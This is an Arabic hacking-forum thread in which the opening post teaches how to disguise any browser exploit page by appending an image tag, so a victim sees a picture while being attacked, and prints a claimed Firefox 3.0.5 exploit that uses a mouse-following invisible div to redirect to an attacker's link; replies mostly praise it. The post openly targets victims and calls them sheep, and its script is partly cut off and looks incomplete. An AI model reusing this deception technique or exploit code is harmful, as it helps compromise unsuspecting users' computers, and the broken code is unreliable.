[ شرح ] طريقة إضافة صورة لأي ثغرة!!

تم تحميل الصفحة في 0,1431322 ثانية
طريقة إضافة صورة لأي ثغرة!!
الحالة
مغلق و غير مفتوح للمزيد من الردود.
إنضم
29 مايو 2009
المشاركات
189
الإعجابات
5
النقاط
0
السلامـ عليكمـ ورحمة الله وبركاتة

كيفكمـ أعضاء الديــف بوينـــــت ؟!

إن شاء الله بخيـــر

اليومـ حبيت أشرح طريقة ما ادري والله مكرره ولا لأ

الطريقة هي :


لو عندك اي ثغرة في العالم حق متصفح غالباً لمــن يفتـــح الضحية الرابـــط

تجيه شاشة بيضة يعني فاضية هو اكيد بيشك

عشان كذا طريقتي بدال ماتطلع الصفحة فاضيــة

تطلع الصورة طبعاً انت تختارها

وفي نفس الوقت يتـــمـ الدعسـ :30:

يعني الضحية مابيحس

هو يتفرج الصورة وانت قاعدتحوس بالـسي خخخخخخ

ااوك آســف طولت عليكـــمـــ !!

طيب

الحين الطريقة

الطريقة هي اننا نضيــف هذا الكود

<p align=center><img src=هنا ضع رابط الصورة ></img></p>

انا بسوي مثال على ثغرة فايرفوكس 3.0.5

الثغرة قبل إضافة الكود

======================================

<html>
<body>
<div id="mydiv"
onmouseover="document.location='ضع هنا الرابط';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
**********
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>

======================================


الثغرة بعد إضافة الكود

============================


<html>
<body>
<div id="mydiv"
onmouseover="document.location='ضع هنا الرابط';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
**********
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>


<p align=center><img src=هنا ضع رابط الصورة ></img></p>

============================



يعني تضيف الكود بعد الثغرة وبعدين تحفظها في ملف html

وترفعها على مسافتك الخاصة

وارسل الرابط الخاروف يشوف الصورة وانت دعست عليه

وإعذروني انا طولت لأني حبيــت يكون الشرح مفهومــ

مستنيكمـ
 

HiDROJeN

Beginner Developer
rankrankrankrank
إنضم
24 يونيو 2009
المشاركات
1,116
الإعجابات
196
النقاط
0
رد: طريقة إضافة صورة لأي ثغرة!!

بأكواد html تقدر تضيف اي شيء

تسلم يا غالي ع المجهود
 
إنضم
29 مايو 2009
المشاركات
189
الإعجابات
5
النقاط
0
رد: طريقة إضافة صورة لأي ثغرة!!

ولو الطريقة معروفة لكن البعض لا يعرفها

لكن انت بدلت مجهود تشكر عليه

الى الامام

:6:
اخوي والله انا تعبت صراحة <<< إن شاء الله مايروح التعب على الفاضي

يعطيك العافية
 

dr.ze3la

Beginner Developer
rank
إنضم
13 يونيو 2009
المشاركات
54
الإعجابات
1
النقاط
0
رد: طريقة إضافة صورة لأي ثغرة!!

مشكور يا خوي على الموضوع و الله الى الامام:29:
 

Trojan8

Beginner Developer
rank
إنضم
26 يونيو 2009
المشاركات
99
الإعجابات
1
النقاط
0
رد: طريقة إضافة صورة لأي ثغرة!!

كتير مفيدة الحركة و لذيذة :6:

مشكور يا نمر
 

Ma$ter

DeveloPer Plus
rankrank
إنضم
6 مارس 2009
المشاركات
389
الإعجابات
85
النقاط
28
رد: طريقة إضافة صورة لأي ثغرة!!

يعطيك العافيه يا بطل



ـــ
 

ŋэνęя

Beginner Developer
rankrankrankrank
إنضم
5 يونيو 2009
المشاركات
1,233
الإعجابات
62
النقاط
0
رد: طريقة إضافة صورة لأي ثغرة!!

الهكر الأخلاقي

شآآكر لك موضوعك الرآآئع :6:

+ أحلى تقييم !
 
إنضم
4 ديسمبر 2008
المشاركات
2,681
الإعجابات
123
النقاط
0
العمر
35
رد: طريقة إضافة صورة لأي ثغرة!!

يعطيك العافية حبيبي

مبدع

ســـــــــــــــلأإأإمـ
 
إنضم
21 يونيو 2009
المشاركات
434
الإعجابات
71
النقاط
28
رد: طريقة إضافة صورة لأي ثغرة!!

( طيب يالغلا ابي اسئلك يعني اقدر اخلي الصيغه : Jpg ، ولا ماتجي واذا على html ، زي ماقال الي قبلي اي شي يركب عليهاَ ، والف شكررررر على الكود ولا حرمناَ ابد1عك )
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل